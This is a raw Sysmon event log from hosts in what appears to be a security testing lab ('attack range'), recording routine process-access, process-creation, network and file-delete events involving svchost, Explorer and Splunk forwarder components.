14:18:17.431{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:17.431{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:17.431{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:17.431{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-1829-629A-4C42-000000005F02}7408C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:17.431{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1829-629A-4C42-000000005F02}7408C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:17.431{2E1864BB-1829-629A-4C42-000000005F02}7408C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000205296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:14.823{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56374-false10.0.1.12-8000- 23542300x800000000000000044260Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:18.299{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76AC6B50076048615AFDEF947F160FC1,SHA256=A92F56AA5AF9ED6E26AE06813BDA20C28E09F6A5846A95E086646BC277B633CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2A00-000000005F02}2168C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2A00-000000005F02}2168C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA41-6299-5C07-000000005F02}5320C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA41-6299-5C07-000000005F02}5320C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA41-6299-5C07-000000005F02}5320C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 